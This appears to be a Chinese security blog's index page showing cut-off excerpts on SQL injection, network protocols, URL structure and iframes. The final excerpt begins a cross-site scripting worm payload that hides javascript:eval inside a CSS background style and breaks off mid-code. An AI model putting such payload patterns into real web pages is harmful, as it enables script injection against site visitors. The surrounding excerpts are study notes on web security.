登天之路

SQL注入：利用现有应用程序，将(恶意)的SQL命令注入到后台数据库引擎执行的能力，这是SQL注入的标准释义。随着B/S模式被广泛的应用，用这种模式编写应用程序的程序员也越来越多，但由于开发人员的水平和经验参差不齐，相当一部分的开发人员在编写代码的时候，没有对用户的输入数据或者是页面中所携带的信息（如Cookie）进行必要的合法性判断，导致了攻击者可以提交一段数据库查询代码，根据程序返回的结果，获得

一、协议： 网络是一个信息交换的场所，所有接入网络的计算机都可以通过彼此之间的物理连设备行信息交换，这种物理设备包括最常见的电缆、光缆、无线WAP和微波等，但是单纯拥有这些物理设备并不能实现信息的交换，这就好像人类的身体不能缺少大脑的支配一样，信息交换还要具备软件环境，这种“软件环境”是人类实现规定好的一些规则，被称作“协议”，有了协议，不同的电脑可以遵照相同的协议使用物理设备，并且不会造成相

前言：基础太烂，在这做一下记录，对基础知识进行学习。URL：统一资源定位符。 超文本传输协议（HTTP）的统一资源定位符将从因特网获取信息的五个基本元素包括在一个简单的地址中：1、传送协议。 2、服务器。（通常为域名，有时为IP地址） 3、端口号。（以数字方式表示，若为HTTP的预设值“:80”可省略） 4、路径。（以“/”字元区别路径中的每一个目录名称） 5、查询。（GET模式

深入理解iframeiframe是内联框架。 写法：<iframe id="corelframe" name="corelframe" src="/blank.html"></iframe>常用属性： 　　1.frameborder:是否显示边框，yes,no。　　2.height:框架作为一个普通元素的高度，建议在使用css设置。　　3.width:框架作为一个普通元素的宽度，建议使用css设

<div id=mycode style=”BACKGROUND: url('javascript:eval(document.all.mycode.expr)')”expr=”var B = String.fromCharCode(34);var A = String.fromCharCode(39);function g() {var C;try {var D = document